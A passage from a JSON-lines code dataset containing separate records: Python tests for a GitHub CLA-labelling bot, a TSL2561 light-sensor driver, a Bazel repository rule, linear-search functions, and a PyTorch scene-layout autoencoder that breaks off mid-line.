200)\n\n def test_process_skipping(self):\n # Only create a ContibHost object if the PR is opened, unlabeled, or\n # synchronized.\n for event in github.PullRequestEvent:\n if event in self.acceptable:\n continue\n payload = {'action': event.value}\n request = util.FakeRequest(payload)\n with self.assertRaises(ni_abc.ResponseExit) as cm:\n self.run_awaitable(github.Host.process(util.FakeServerHost(),\n request))\n self.assertEqual(cm.exception.response.status, 204)\n\n def test_process_opened(self):\n request = util.FakeRequest(self.opened_example)\n result = self.run_awaitable(github.Host.process(util.FakeServerHost(),\n request))\n self.assertEqual(result.event, github.PullRequestEvent.opened)\n\n def test_process_unlabeled(self):\n # Test a CLA label being removed.\n unlabeled_example_CLA = copy.deepcopy(self.unlabeled_example)\n unlabeled_example_CLA['label']['name'] = github.CLA_OK\n request = util.FakeRequest(unlabeled_example_CLA)\n result = self.run_awaitable(github.Host.process(util.FakeServerHost(),\n request))\n self.assertEqual(result.event, github.PullRequestEvent.unlabeled)\n # Test a non-CLA label being removed.\n unlabeled_example_other = copy.deepcopy(self.unlabeled_example)\n unlabeled_example_other['label']['name'] = 'missing something or other'\n request = util.FakeRequest(unlabeled_example_other)\n with self.assertRaises(ni_abc.ResponseExit) as cm:\n self.run_awaitable(github.Host.process(util.FakeServerHost(),\n request))\n self.assertEqual(cm.exception.response.status, 204)\n\n def test_process_synchronize(self):\n request = util.FakeRequest(self.synchronize_example)\n result = self.run_awaitable(github.Host.process(util.FakeServerHost(),\n request))\n self.assertEqual(result.event, github.PullRequestEvent.synchronize)\n\n def test_check_response(self):\n # Throw a fit for anything that isn't a 2XX response.\n github.Host.check_response(web.Response(status=202))\n with self.assertRaises(Exception):\n github.Host.check_response(web.Response(status=301))\n with self.assertRaises(Exception):\n github.Host.check_response(web.Response(status=404))\n with self.assertRaises(Exception):\n github.Host.check_response(web.Response(status=502))\n\n def test_usernames(self):\n # Should grab logins from the PR creator of the PR, and both the author\n # and committer for every commit in the PR.\n what = ('GET', self.commits_url)\n network = {what: self.commits_example}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n got = self.run_awaitable(contrib.usernames(util.FakeSession()))\n want = {'brettcannon', 'rbtcollins-author', 'rbtcollins-committer',\n 'dstufft-author', 'dstufft-committer'}\n self.assertEqual(got, frozenset(want))\n\n def test_labels_url(self):\n # Get the proper labels URL for a PR.\n network = {('GET', self.issues_url): self.issues_example}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n got = self.run_awaitable(contrib.labels_url(util.FakeSession()))\n want = self.labels_url.format_map({'/name': ''})\n self.assertEqual(got, want)\n\n got = self.run_awaitable(contrib.labels_url(util.FakeSession(),\n github.CLA_OK))\n label = parse.quote(github.CLA_OK)\n want = '{}/{}'.format(self.labels_url, label)\n self.assertEqual(got, want)\n\n def test_current_label(self):\n # Test getting the current CLA label (if any).\n network = {('GET', self.issues_url): self.issues_example}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.synchronize,\n self.synchronize_example,\n network=network)\n # No label set.\n network[('GET', self.labels_url)] = []\n label = self.run_awaitable(contrib.current_label(util.FakeSession()))\n self.assertIsNone(label)\n # One CLA label set.\n network[('GET', self.labels_url)] = self.labels_example\n label = self.run_awaitable(contrib.current_label(util.FakeSession()))\n self.assertEqual(label, github.CLA_OK)\n # Two CLA labels set (error case).\n network[('GET', self.labels_url)] = [{'name': github.CLA_OK},\n {'name': github.NO_CLA}]\n label = self.run_awaitable(contrib.current_label(util.FakeSession()))\n # Just don't blow up.\n self.assertIsNotNone(label)\n\n def test_set_label(self):\n # If the status is \"signed\" then add the positive label, else use the\n # negative one.\n network = {('GET', self.issues_url): self.issues_example,\n ('POST', self.labels_url): [github.CLA_OK]}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n label = self.run_awaitable(contrib.set_label(util.FakeSession(),\n ni_abc.Status.signed))\n self.assertEqual(label, github.CLA_OK)\n network[('POST', self.labels_url)] = [github.NO_CLA]\n label = self.run_awaitable(contrib.set_label(util.FakeSession(),\n ni_abc.Status.not_signed))\n self.assertEqual(label, github.NO_CLA)\n self.run_awaitable(contrib.set_label(util.FakeSession(),\n ni_abc.Status.username_not_found))\n self.assertEqual(label, github.NO_CLA)\n\n def test_remove_label(self):\n # Remove all CLA-related labels.\n deletion_url = self.labels_url + '/' + parse.quote(github.CLA_OK)\n network = {('GET', self.issues_url): self.issues_example,\n ('GET', self.labels_url): self.labels_example,\n ('DELETE', deletion_url): True}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.synchronize,\n self.synchronize_example,\n network=network)\n deleted = self.run_awaitable(contrib.remove_label(util.FakeSession()))\n self.assertEqual(deleted, github.CLA_OK)\n network[('GET', self.labels_url)] = []\n deleted = self.run_awaitable(contrib.remove_label(util.FakeSession()))\n self.assertIsNone(deleted)\n\n def test_comment(self):\n # Add a comment related to the status.\n network = {}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n message = self.run_awaitable(contrib.comment(util.FakeSession(),\n ni_abc.Status.signed))\n self.assertIsNone(message)\n expected = {'body':\n github.NO_CLA_TEMPLATE.format(body=github.NO_CLA_BODY)}\n network[('POST', self.comments_url)] = expected\n message = self.run_awaitable(contrib.comment(util.FakeSession(),\n ni_abc.Status.not_signed))\n self.assertEqual(message, expected['body'])\n expected['body'] = github.NO_CLA_TEMPLATE.format(\n body=github.NO_USERNAME_BODY)\n network[('POST', self.comments_url)] = expected\n message = self.run_awaitable(contrib.comment(util.FakeSession(),\n ni_abc.Status.username_not_found))\n self.assertEqual(expected['body'], message)\n\n def test_update_opened(self):\n # Adding CLA status on an opened PR.\n comment = github.NO_CLA_TEMPLATE.format(body=github.NO_CLA_BODY)\n network = {('GET', self.issues_url): self.issues_example,\n ('POST', self.labels_url): [github.NO_CLA],\n ('POST', self.comments_url): {'body': comment}}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.opened,\n self.opened_example,\n network=network)\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.not_signed))\n\n def test_update_unlabeled(self):\n # Adding CLA status to a PR that just lost its CLA label.\n network = {('GET', self.issues_url): self.issues_example,\n ('POST', self.labels_url): [github.CLA_OK]}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.unlabeled,\n self.unlabeled_example,\n network=network)\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.signed))\n\n def test_update_synchronize(self):\n # Update the PR after it's synchronized.\n network = {('GET', self.issues_url): self.issues_example}\n contrib = OfflineHost(util.FakeServerHost(),\n github.PullRequestEvent.synchronize,\n self.synchronize_example,\n network=network)\n # CLA signed and already labeled as such.\n network[('GET', self.labels_url)] = self.labels_example\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.signed))\n # CLA signed, but not labeled as such.\n network[('GET', self.labels_url)] = [{'name': github.NO_CLA}]\n deletion_url = self.run_awaitable(\n contrib.labels_url(util.FakeSession(), github.NO_CLA))\n network[('DELETE', deletion_url)] = [github.NO_CLA]\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.signed))\n # CLA not signed and already labeled as such.\n network[('GET', self.labels_url)] = [{'name': github.NO_CLA}]\n self.noException(contrib.update(util.FakeSession(), ni_abc.Status.not_signed))\n # CLA not signed, but currently labeled as such.\n network[('GET', self.labels_url)] = [{'name': github.CLA_OK}]\n deletion_url = self.run_awaitable(\n contrib.labels_url(util.FakeSession(),github.CLA_OK))\n network[('DELETE', deletion_url)] = [github.CLA_OK]\n comment = github.NO_CLA_TEMPLATE.format(body=github.NO_CLA_BODY)\n network[('POST', self.comments_url)] = {'body': comment}\n self.noException(contrib.update(util.FakeSession(),\n ni_abc.Status.not_signed))\n # No GitHub username, but already labeled as no CLA.\n network[('GET', self.labels_url)] = [{'name': github.NO_CLA}]\n self.noException(contrib.update(util.FakeSession(),\n ni_abc.Status.username_not_found))\n # No GitHub username, but labeled as signed.\n network[('GET', self.labels_url)] = [{'name': github.CLA_OK}]\n deletion_url = self.run_awaitable(\n contrib.labels_url(util.FakeSession(), github.CLA_OK))\n network[('DELETE', deletion_url)] = [github.CLA_OK]\n comment = github.NO_CLA_TEMPLATE.format(body=github.NO_USERNAME_BODY)\n network[('POST', self.comments_url)] = {'body': comment}\n self.noException(contrib.update(util.FakeSession(),\n ni_abc.Status.username_not_found))\n\n\nclass NetworkingTests(util.TestCase):\n\n def test_get(self):\n # Test a GET request to a live GitHub API URL.\n contrib = github.Host(util.FakeServerHost(),\n github.PullRequestEvent.opened, {})\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n payload = {'hello': 'world'}\n fake_session = util.FakeSession(data=payload)\n returned = self.noException(contrib.get(fake_session, url))\n self.assertEqual(payload, returned)\n self.assertEqual(fake_session.url, url)\n self.assertIn('Authorization', fake_session.headers)\n self.assertEqual(fake_session.headers['Authorization'],\n 'token ' + util.FakeServerHost.auth_token)\n # Test making a failed request.\n failed_response = util.FakeResponse(status=404)\n fake_session = util.FakeSession(response=failed_response)\n with self.assertRaises(client.HTTPException):\n self.run_awaitable(contrib.get(fake_session, url))\n\n def test_post(self):\n contrib = github.Host(util.FakeServerHost(), None, None)\n data = {'hello': 'world'}\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n fake_session = util.FakeSession()\n self.noException(contrib.post(fake_session, url, data))\n self.assertEqual(fake_session.url, url)\n json_string = fake_session.data.decode('utf-8')\n self.assertEqual(json.loads(json_string), data)\n user_agent = fake_session.headers[hdrs.USER_AGENT]\n self.assertEqual(user_agent, util.FakeServerHost.user_agent_name)\n content_type = fake_session.headers[hdrs.CONTENT_TYPE]\n self.assertTrue(content_type.startswith('application/json'))\n self.assertIn('Authorization', fake_session.headers)\n self.assertEqual(fake_session.headers['Authorization'],\n 'token ' + util.FakeServerHost.auth_token)\n # Test making a failed request.\n failed_response = util.FakeResponse(status=404)\n fake_session = util.FakeSession(response=failed_response)\n with self.assertRaises(client.HTTPException):\n self.run_awaitable(contrib.post(fake_session, url, data))\n # Test no user-agent.\n fake_server = util.FakeServerHost()\n fake_server.user_agent_name = None\n contrib = github.Host(fake_server, None, None)\n data = {'hello': 'world'}\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n fake_session = util.FakeSession()\n self.noException(contrib.post(fake_session, url, data))\n self.assertEqual(fake_session.url, url)\n json_string = fake_session.data.decode('utf-8')\n self.assertEqual(json.loads(json_string), data)\n self.assertNotIn(hdrs.USER_AGENT, fake_session.headers)\n\n def test_delete(self):\n contrib = github.Host(util.FakeServerHost(), None, None)\n data = {'hello': 'world'}\n url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n fake_session = util.FakeSession()\n self.noException(contrib.delete(fake_session, url))\n self.assertEqual(fake_session.url, url)\n self.assertIn('Authorization', fake_session.headers)\n self.assertEqual(fake_session.headers['Authorization'],\n 'token ' + util.FakeServerHost.auth_token)\n # Test making a failed request.\n failed_response = util.FakeResponse(status=404)\n fake_session = util.FakeSession(response=failed_response)\n with self.assertRaises(client.HTTPException):\n self.run_awaitable(contrib.delete(fake_session, url))\n","sub_path":"ni/test/test_github.py","file_name":"test_github.py","file_ext":"py","file_size_in_byte":18893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"392740962","text":"import time\nimport Adafruit_GPIO.I2C as I2C\nfrom sensors.AbstractSensor import AbstractSensor\n\n\"\"\"\nDataSheet: https://cdn-shop.adafruit.com/datasheets/TSL2561.pdf\nProduct page: https://www.adafruit.com/product/439\nOriginal implementation: https://github.com/seanbechhofer/raspberrypi/blob/master/python/TSL2561.py\nComponent name: TSL2561\nCommunication protocol: i2c\n\"\"\"\n\n\nclass TSL2561(AbstractSensor):\n\n\tdef print_output(self):\n\t\tprint(__class__.__name__)\n\t\tprint(\"LUX HIGH GAIN \", self.read(16))\n\t\tprint(\"LUX LOW GAIN \", self.read(1))\n\t\tprint(\"LUX AUTO GAIN \", self.read())\n\t\tprint()\n\n\tdef __init__(self, address=0x39, debug=0, pause=0.8):\n\t\tself.i2c = I2C.Device(address, I2C.get_default_bus())\n\t\tself.address = address\n\t\tself.pause = pause\n\t\tself.debug = debug\n\t\tself.gain = 0 # no gain preselected\n\t\tself.i2c.write8(0x80, 0x03) # enable the device\n\n\tdef set_gain(self, gain=1):\n\t\t\"\"\" Set the gain \"\"\"\n\t\tif gain != self.gain:\n\t\t\tif gain == 1:\n\t\t\t\tself.i2c.write8(0x81, 0x02) # set gain = 1X and timing = 402 mSec\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"Setting low gain\")\n\t\t\telse:\n\t\t\t\tself.i2c.write8(0x81, 0x12) # set gain = 16X and timing = 402 mSec\n\t\t\t\tif self.debug:\n\t\t\t\t\tprint(\"Setting high gain\")\n\t\t\tself.gain = gain # safe gain for calculation\n\t\t\ttime.sleep(self.pause) # pause for integration (self.pause must be bigger than integration time)\n\n\tdef read_word(self, reg):\n\t\t\"\"\"Reads a word from the I2C device\"\"\"\n\t\ttry:\n\t\t\twordval = self.i2c.readU16(reg)\n\t\t\tnewval = I2C.reverseByteOrder(wordval)\n\t\t\tif self.debug:\n\t\t\t\tprint(\"I2C: Device 0x%02X returned 0x%04X from reg 0x%02X\" % (self.address, wordval & 0xFFFF, reg))\n\t\t\treturn newval\n\t\texcept IOError:\n\t\t\tprint(\"Error accessing 0x%02X: Check your I2C address\" % self.address)\n\t\t\treturn -1\n\n\tdef read_full(self, reg=0x8C):\n\t\t\"\"\"Reads visible+IR diode from the I2C device\"\"\"\n\t\treturn self.read_word(reg)\n\n\tdef read_ir(self, reg=0x8E):\n\t\t\"\"\"Reads IR only diode from the I2C device\"\"\"\n\t\treturn self.read_word(reg)\n\n\tdef read(self, gain=0):\n\t\t\"\"\"Grabs a lux reading either with autoranging (gain=0) or with a specified gain (1, 16)\"\"\"\n\n\t\tir = None\n\t\tambient = None\n\t\tlux = None\n\n\t\tif gain == 1 or gain == 16:\n\t\t\tself.set_gain(gain) # low/highGain\n\t\t\tambient = self.read_full()\n\t\t\tir = self.read_ir()\n\t\telif gain == 0: # auto gain\n\t\t\tself.set_gain(16) # first try highGain\n\t\t\tambient = self.read_full()\n\t\t\tif ambient < 65535:\n\t\t\t\tir = self.read_ir()\n\t\t\tif ambient >= 65535 or ir >= 65535: # value(s) exeed(s) datarange\n\t\t\t\tself.set_gain(1) # set lowGain\n\t\t\t\tambient = self.read_full()\n\t\t\t\tir = self.read_ir()\n\n\t\tif self.gain == 1:\n\t\t\tambient *= 16 # scale 1x to 16x\n\t\t\tir *= 16 # scale 1x to 16x\n\n\t\tratio = (ir / float(ambient)) # changed to make it run under python 2\n\n\t\tif self.debug:\n\t\t\tprint(\"IR Result\", ir)\n\t\t\tprint(\"Ambient Result\", ambient)\n\n\t\tif (ratio >= 0) and (ratio <= 0.52):\n\t\t\tlux = (0.0315 * ambient) - (0.0593 * ambient * (ratio ** 1.4))\n\t\telif ratio <= 0.65:\n\t\t\tlux = (0.0229 * ambient) - (0.0291 * ir)\n\t\telif ratio <= 0.80:\n\t\t\tlux = (0.0157 * ambient) - (0.018 * ir)\n\t\telif ratio <= 1.3:\n\t\t\tlux = (0.00338 * ambient) - (0.0026 * ir)\n\t\telif ratio > 1.3:\n\t\t\tlux = 0\n\n\t\treturn lux\n\n","sub_path":"sensors/TSL2561.py","file_name":"TSL2561.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"604038122","text":"def _hello_repo_impl(ctx):\n ctx.file(\"hello.txt\", ctx.attr.message)\n ctx.file(\"BUILD.bazel\", 'exports_files([\"hello.txt\"])')\n ctx.file(\"ver.bzl\", 'VERSION = \"212.0.1.3\"\\n')\n\nhello_repo = repository_rule(\n implementation = _hello_repo_impl,\n attrs = {\n \"message\": attr.string(\n mandatory = True,\n ),\n },\n)\n","sub_path":"deps.bzl","file_name":"deps.bzl","file_ext":"bzl","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"424252067","text":"def iteracyjnie(arr, l, r, x):\n while l < r:\n if arr[l] == x:\n return l\n l = l + 1\n return -1\n\n\ndef recSearch(arr, l, r, x):\n if r < l:\n return -1\n if arr[l] == x:\n return l\n if arr[r] == x:\n return r\n return recSearch(arr, l + 1, r - 1, x)\n\n\narr = [12, 34, 54, 2, 3]\nn = len(arr)\nx = 3\nindex = recSearch(arr, 0, n - 1, x)\nif index != -1:\n print(\"Element\", x, \"is present at index %d\" % index)\nelse:\n print(\"Element %d is not present\" % x)\nindex2 = iteracyjnie(arr, 0, n, x)\nif index2 != -1:\n print(\"Element\", x, \"is present at index %d\" % index2)\nelse:\n print(\"Element %d is not present\" % x)\n","sub_path":"cwiczenia3/liniowe.py","file_name":"liniowe.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"211227244","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 23 23:24:32 2017\n\n@author: agadipat\n\"\"\"\n\nfrom __future__ import division\nfrom __future__ import absolute_import\nimport math\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom time import time\nfrom itertools import izip\n\n#########################################################################################\n## Encoder\n#########################################################################################\n\nclass Sampler(nn.Module):\n\n def __init__(self, feature_size, hidden_size):\n super(Sampler, self).__init__()\n self.mlp1 = nn.Linear(feature_size, hidden_size)\n self.mlp2mu = nn.Linear(hidden_size, feature_size)\n self.mlp2var = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n \n def forward(self, input):\n encode = self.tanh(self.mlp1(input))\n mu = self.mlp2mu(encode)\n logvar = self.mlp2var(encode)\n std = logvar.mul(0.5).exp_()\n eps = Variable(torch.FloatTensor(std.size()).normal_().cuda())\n KLD_element = mu.pow(2).add_(logvar.exp()).mul_(-1).add_(1).add_(logvar)\n return torch.cat([eps.mul(std).add_(mu), KLD_element], 1)\n\nclass BoxEncoder(nn.Module): # Box Encoder\n\n def __init__(self, input_size,feature_size): \n super(BoxEncoder, self).__init__()\n self.encoder = nn.Linear(input_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, box_input):\n box_vector = self.encoder(box_input)\n box_vector = self.tanh(box_vector)\n return box_vector\n \nclass SuppEncoder(nn.Module): # Support Encoder\n\n def __init__(self, feature_size, relpos_size, hidden_size):\n super(SuppEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size)\n self.right = nn.Linear(feature_size, hidden_size, bias=False)\n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, right_input, relpos_right):\n output = self.left(left_input)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output) \n output = self.tanh(output)\n return output\n \nclass CoocEncoder(nn.Module): # Co-occurrence Encoder\n\n def __init__(self, feature_size, relpos_size, hidden_size):\n super(CoocEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size)\n self.right = nn.Linear(feature_size, hidden_size, bias=False)\n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, right_input, relpos_right):\n output = self.left(left_input)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n\nclass SrndEncoder(nn.Module): # SURROUND Encoder\n\n def __init__(self, feature_size, relpos_size, hidden_size):\n super(SrndEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size) \n self.right = nn.Linear(feature_size, hidden_size, bias=False) \n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.center = nn.Linear(feature_size, hidden_size, bias=False) \n self.centerpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, center_input, relpos_center, right_input, relpos_right):\n output = self.left(left_input)\n output += self.center(center_input)\n output += self.centerpos(relpos_center)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n\n \nclass R5Encoder(nn.Module): # Root Encoder class for merging all the 4 walls and the floor\n def __init__(self, feature_size, feature_size2, relpos_size,hidden_size):\n super(R5Encoder, self).__init__()\n self.rc1 = nn.Linear(feature_size, hidden_size) \n self.rc2 = nn.Linear(feature_size, hidden_size, bias=False) \n self.rc3 = nn.Linear(feature_size, hidden_size, bias=False) \n self.rc4 = nn.Linear(feature_size, hidden_size, bias=False) \n self.rc5 = nn.Linear(feature_size, hidden_size, bias=False) \n self.relpos_12 = nn.Linear(relpos_size, hidden_size, bias=False)\n self.relpos_13 = nn.Linear(relpos_size, hidden_size, bias=False) \n self.relpos_14 = nn.Linear(relpos_size, hidden_size, bias=False) \n self.relpos_15 = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size2)\n self.tanh = nn.Tanh() \n\n def forward(self, rc1, rc2, relpos_12, rc3, relpos_13, rc4, relpos_14, rc5,relpos_15):\n output = self.rc1(rc1)\n output += self.rc2(rc2)\n output += self.relpos_12(relpos_12)\n \n output += self.rc3(rc3)\n output += self.relpos_13(relpos_13)\n \n output += self.rc4(rc4)\n output += self.relpos_14(relpos_14)\n \n output += self.rc5(rc5)\n output += self.relpos_15(relpos_15)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n \n\nclass WallEncoder(nn.Module): # Wall Encoder\n\n def __init__(self, feature_size, relpos_size, hidden_size):\n super(WallEncoder, self).__init__()\n self.left = nn.Linear(feature_size, hidden_size) \n self.right = nn.Linear(feature_size, hidden_size, bias=False) \n self.rightpos = nn.Linear(relpos_size, hidden_size, bias=False)\n self.second = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n\n def forward(self, left_input, right_input, relpos_right):\n output = self.left(left_input)\n output += self.right(right_input)\n output += self.rightpos(relpos_right)\n output = self.tanh(output)\n output = self.second(output)\n output = self.tanh(output)\n return output\n \n\nclass GRAINSEncoder(nn.Module):\n\n def __init__(self, config):\n super(GRAINSEncoder, self).__init__()\n self.boxEncoder = BoxEncoder(input_size = config.box_code_size, feature_size = config.feature_size)\n self.suppEncoder = SuppEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.coocEncoder = CoocEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.srndEncoder = SrndEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.r5Encoder = R5Encoder(feature_size = config.feature_size, feature_size2 = config.feature_size2, relpos_size = config.relpos_size, hidden_size = config.hidden_size2)\n self.wallEncoder = WallEncoder(feature_size = config.feature_size, relpos_size = config.relpos_size, hidden_size = config.hidden_size)\n self.sampler = Sampler(feature_size = config.feature_size2, hidden_size = config.hidden_size)\n\n def leafNode(self, box):\n return self.boxEncoder(box)\n\n def suppNode(self, left, right,relpos_right):\n return self.suppEncoder(left, right,relpos_right)\n\n def coocNode(self, left,right,relpos_right):\n return self.coocEncoder(left, right,relpos_right)\n\n def srndNode(self, left, center, relpos_center, right, relpos_right):\n return self.srndEncoder(left, center,relpos_center, right, relpos_right)\n \n def r5Node(self, rc1,rc2,relpos_12, rc3, relpos_13, rc4, relpos_14, rc5, relpos_15):#,w3,r13,w4,r14):\n return self.r5Encoder(rc1,rc2,relpos_12, rc3, relpos_13, rc4, relpos_14, rc5, relpos_15)#,w3,r13,w4,r14)\n\n def wallNode(self, left, right, relpos_right):\n return self.wallEncoder(left, right, relpos_right)\n \n def sampleLayer(self, feature):\n return self.sampler(feature)\n\n \ndef encode_structure_fold(fold, tree):\n \n def encode_node(node): \n if node.is_leaf():\n return fold.add(u'leafNode', node.box)\n \n elif node.is_supp():\n left = encode_node(node.left)\n right = encode_node(node.right)\n return fold.add(u'suppNode', left, right, node.relpos_right)\n \n elif node.is_cooc():\n left = encode_node(node.left)\n right = encode_node(node.right)\n return fold.add(u'coocNode', left, right, node.relpos_right)\n \n elif node.is_srnd():\n left = encode_node(node.left)\n center = encode_node(node.center)\n right = encode_node(node.right)\n return fold.add(u'srndNode', left, center, node.relpos_center, right, node.relpos_right) \n \n elif node.is_root5():\n rc1 = encode_node(node.left)\n rc2 = encode_node(node.center)\n rc3 = encode_node(node.right)\n rc4 = encode_node(node.root4)\n rc5 = encode_node(node.root5)\n return fold.add(u'r5Node',rc1,rc2,node.relpos_center, rc3, node.relpos_right, rc4, node.relpos3, rc5, node.relpos4)#,w3,node.relpos_right,w4,node.relpos_wall4)\n \n elif node.is_wall():\n left = encode_node(node.left)\n right = encode_node(node.right)\n return fold.add(u'wallNode', left, right, node.relpos_right)\n \n encoding = encode_node(tree.root)\n return fold.add(u'sampleLayer', encoding)\n\n#########################################################################################\n## Decoder\n#########################################################################################\n\n\nclass NodeClassifier(nn.Module):\n\n def __init__(self, feature_size, hidden_size):\n super(NodeClassifier, self).__init__()\n self.mlp1 = nn.Linear(feature_size, hidden_size)\n self.tanh = nn.Tanh()\n self.mlp2 = nn.Linear(hidden_size, 5) # there are 5 kinds of encoders , BOX, SUPP, CO-OC, SRND and WALL\n #self.softmax = nn.Softmax()\n\n def forward(self, input_feature):\n output = self.mlp1(input_feature)\n output = self.tanh(output)\n output = self.mlp2(output)\n #output = self.softmax(output)\n return output\n\nclass SampleDecoder(nn.Module):\n u\"\"\" Decode a randomly sampled noise into a feature vector \"\"\"\n def __init__(self, feature_size, hidden_size):\n super(SampleDecoder, self).__init__()\n self.mlp1 = nn.Linear(feature_size, hidden_size)\n self.mlp2 = nn.Linear(hidden_size, feature_size)\n self.tanh = nn.Tanh()\n \n def forward(self, input_feature):\n output = self.tanh(self.mlp1(input_feature))\n output = self.tanh(self.mlp2(output))\n return output\n\n\nclass SuppDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(SuppDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector) \n left_code = self.tanh(left_code)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, right_code, right_pos\n\n\t\t\nclass CoocDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(CoocDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector)\n left_code = self.tanh(left_code)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, right_code, right_pos\n\nclass SrndDecoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size,relpos_size, hidden_size):\n super(SrndDecoder, self).__init__()\n self.mlp = nn.Linear(feature_size, hidden_size)\n self.mlp_left = nn.Linear(hidden_size, feature_size)\n self.mlp_center = nn.Linear(hidden_size, feature_size)\n self.mlp_centerpos = nn.Linear(hidden_size, relpos_size)\n self.mlp_right = nn.Linear(hidden_size, feature_size)\n self.mlp_rightpos = nn.Linear(hidden_size, relpos_size)\n self.tanh = nn.Tanh()\n\n def forward(self, parent_feature):\n vector = self.mlp(parent_feature)\n vector = self.tanh(vector)\n left_code = self.mlp_left(vector) \n left_code = self.tanh(left_code)\n center_code = self.mlp_center(vector)\n center_code = self.tanh(center_code)\n center_pos = self.mlp_centerpos(vector)\n center_pos = self.tanh(center_pos)\n right_code = self.mlp_right(vector)\n right_code = self.tanh(right_code)\n right_pos = self.mlp_rightpos(vector)\n right_pos = self.tanh(right_pos)\n return left_code, center_code, center_pos, right_code, right_pos\n\nclass R5Decoder(nn.Module):\n u\"\"\" Decode an input (parent) feature into a left-child, left rel_pos. right_child and a right rel_pos feature \"\"\"\n def __init__(self, feature_size, feature_size2, relpos_size, hidden_size):\n super(R5Decoder, self).__init__()\n self.mlp = nn.Linear(feature_size2, hidden_size)\n self.mlp_rc1 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc2 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc3 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc4 = nn.Linear(hidden_size, feature_size)\n self.mlp_rc5 = nn.Linear(hidden_size, feature_size)\n self.mlp_relpos_12 = 